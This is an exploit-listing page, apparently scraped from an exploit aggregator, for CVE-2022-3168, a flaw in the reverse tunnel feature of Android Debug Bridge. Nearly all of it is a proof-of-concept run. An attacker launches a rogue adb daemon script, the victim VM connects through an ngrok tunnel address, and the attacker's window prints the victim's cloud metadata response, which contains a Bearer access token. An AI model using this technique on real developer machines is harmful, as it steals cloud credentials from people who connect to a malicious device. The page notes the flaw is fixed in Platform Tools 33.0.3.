Exploit for CVE-2022-3168

Name: Exploit for CVE-2022-3168
Rating: 5 (240 reviews)
2022-09-09 | CVSS 2.9
## https://sploitus.com/exploit?id=195A678A-E958-5D72-842A-ABE99D4F4375
The reverse tunnel feature in Android Debug Bridge (adb) was vulnerable as it allowed malicious adb daemons to open connections to arbitrary host/ports and unix domain sockets on the host.


Attacker window (where the rogue daemon is running):

```
$ ./adb_rogue_daemon.py
```

Victim window (a GCE VM in this example):

```
$ adb connect serverip:5556
connected to 8.tcp.ngrok.io:19076
```

Attacker window:

```
...
Wooho, we got response for our rouge request!
b'HTTP/1.0 200 OK\r\nMetadata-Flavor: Google\r\nContent-Type: application/json\r\nDate: Thu, 04 Nov 2021 22:31:21 GMT\r\nServer: Metadata Server for VM\r\nConnection: Close\r\nContent-Length: 1049\r\nX-XSS-Protection: 0\r\nX-Frame-Options: SAMEORIGIN\r\n\r\n{"access_token":"ya29.c.KpgBFghLV[redacted].....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................'
<<< b'...................................................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba'
b'...................................................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba'
('....', (774778414, 774778414, 774778414, 774778414, 774778414), b'...........................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba')
```


This was fixed in Platform Tools 33.0.3.